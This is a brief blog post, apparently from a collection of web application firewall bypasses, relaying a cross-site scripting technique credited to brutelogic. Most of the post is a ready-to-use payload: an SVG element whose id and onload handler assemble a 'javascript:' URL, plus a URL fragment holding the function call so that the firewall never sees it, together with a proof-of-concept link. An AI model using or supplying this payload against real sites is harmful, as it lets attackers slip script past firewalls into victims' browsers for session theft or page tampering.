WAF bypass XSS by brutelogic

Date: January 12, 2022Author: wafbypass

Bypassing Complete Parenthesis/Backticks Restrictions in #XSS Payloads with Hiding

#WAF #bypass

1. Inject:
<Svg Id=JavaScrip
OnLoad=location=id+’t:/*’+URL>

2. Place in the end of URL:
#*/confirm(1)

(Everything after # never gets sent to server)

PoC: https://t.co/zxuheCOtZp

Subscribe for the latest news:

Web application firewalls bypasses collection and testing tools